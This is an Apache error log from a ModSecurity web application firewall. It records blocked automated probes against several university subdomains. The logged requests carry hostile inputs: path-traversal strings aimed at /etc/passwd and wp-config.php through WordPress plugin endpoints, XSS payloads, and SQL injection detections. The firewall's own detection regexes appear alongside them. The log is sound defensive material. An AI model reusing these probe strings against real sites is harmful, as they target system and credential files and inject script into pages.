[Tue Aug 29 11:45:48.590202 2023] [:error] [pid 2229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAi1yTYAAAAM"]
[Tue Aug 29 11:45:48.604104 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAhlz7kAAAAi"]
[Tue Aug 29 11:45:48.639686 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAg-pRsAAAAR"]
[Tue Aug 29 11:45:48.970498 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAi2x@UAAAAN"]
[Tue Aug 29 11:45:48.976020 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAi5uAgAAAAS"]
[Tue Aug 29 11:45:48.992694 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAhlz8IAAAAi"]
[Tue Aug 29 11:45:48.996973 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAi5uAkAAAAS"]
[Tue Aug 29 11:45:49.010354 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-cCo-f0AAAi2x@cAAAAN"]
[Tue Aug 29 11:45:49.364588 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAi3ZzUAAAAP"]
[Tue Aug 29 11:45:49.366853 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAdxUnAAAAAC"]
[Tue Aug 29 11:45:49.368165 2023] [:error] [pid 2232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAi4NDcAAAAQ"]
[Tue Aug 29 11:45:49.382732 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAARphOYAAAAU"]
[Tue Aug 29 11:45:49.408732 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-cCo-f0AAAhZRgwAAAAG"]
[Tue Aug 29 11:45:49.409610 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-cCo-f0AAAi5uA0AAAAS"]
[Tue Aug 29 11:45:50.399452 2023] [:error] [pid 2232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-sCo-f0AAAi4ND0AAAAQ"]
[Tue Aug 29 11:45:50.495794 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-sCo-f0AAAhxwrkAAAAv"]
[Tue Aug 29 11:45:51.365293 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAhzvecAAAAx"]
[Tue Aug 29 11:45:51.416503 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAiv-y0AAAAJ"]
[Tue Aug 29 11:45:51.440663 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAhui1wAAAAr"]
[Tue Aug 29 11:45:51.443193 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAfEB4QAAAAO"]
[Tue Aug 29 11:45:51.456946 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAiv-y8AAAAJ"]
[Tue Aug 29 11:45:52.666546 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO14AMCo-f0AAAhlz8YAAAAi"]
[Tue Aug 29 11:45:56.367347 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAhT31YAAAAD"]
[Tue Aug 29 11:45:56.380258 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAhgoLYAAAAb"]
[Tue Aug 29 11:45:56.393664 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAhBSEQAAAAX"]
[Tue Aug 29 11:45:56.412017 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAhrqMkAAAAo"]
[Tue Aug 29 11:45:56.436648 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAARphPgAAAAU"]
[Tue Aug 29 11:45:57.395426 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BcCo-f0AAAipS3kAAAAF"]
[Tue Aug 29 11:46:01.374371 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAhzvfkAAAAx"]
[Tue Aug 29 11:46:01.379460 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAib5wQAAAAA"]
[Tue Aug 29 11:46:01.379600 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAhlz@QAAAAi"]
[Tue Aug 29 11:46:01.387920 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAdxUocAAAAC"]
[Tue Aug 29 11:46:01.404777 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAhzvfoAAAAx"]
[Tue Aug 29 11:46:01.406005 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAhgoL0AAAAb"]
